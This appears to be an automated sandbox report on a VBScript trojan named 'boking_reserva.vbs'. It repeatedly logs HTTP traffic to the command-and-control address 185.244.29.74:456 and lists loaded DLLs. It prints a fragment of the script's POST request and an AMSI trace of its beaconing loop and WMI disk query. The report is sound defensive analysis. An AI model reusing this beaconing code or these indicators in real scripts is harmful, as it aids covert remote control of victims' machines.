Click to jump to signature section
Source: Submited Sample | Integrated Neural Analysis Model: Matched 98.1% probability |
Source: C:\Windows\System32\wscript.exe | Network Connect: 185.244.29.74 456 | Jump to behavior |
Source: | Initial file: xx.open "POST", "http://185.244.29.74:456/document", False:xx.setrequestheader "User-Agent", gg:xx.send |
Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 456 |
Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 456 |
Source: global traffic | TCP traffic: 192.168.2.7:49699 -> 185.244.29.74:456 |
Source: boking_reserva.vbs | Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4 |
Source: boking_reserva.vbs | Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4 |
Source: Joe Sandbox View | ASN Name: DAVID_CRAIGGG DAVID_CRAIGGG |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | HTTP traffic detected: POST /document HTTP/1.1Accept: */*User-Agent: B81A4609Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.244.29.74:456Content-Length: 0Connection: Keep-AliveCache-Control: no-cache |
Source: wscript.exe, 00000000.00000002.3722607572.0000020DA68B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238956045.0000020DA85E4000.00000004.00000020.00020000.00000000.sdmp, boking_reserva.vbs | String found in binary or memory: http://185.244.29.74:456/document |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA9260000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:456/document& |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:456/document0 |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:456/document609 |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:456/documentEncoding: |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:456/documenta |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:456/documentcept-Encoding: |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:456/documentd |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA9260000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:456/documentf |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA9260000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:456/documenti |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:456/documentj |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:456/documentn |
Source: wscript.exe, 00000000.00000002.3723630420.0000020DA92F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com |
Source: C:\Windows\System32\wscript.exe | COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4} | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24} | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820} | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} | Jump to behavior |
Source: boking_reserva.vbs | Initial sample: Strings found which are bigger than 50 |
Source: classification engine | Classification label: mal84.troj.evad.winVBS@1/0@0/1 |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\boking_reserva.vbs" |
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("3100");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://18 |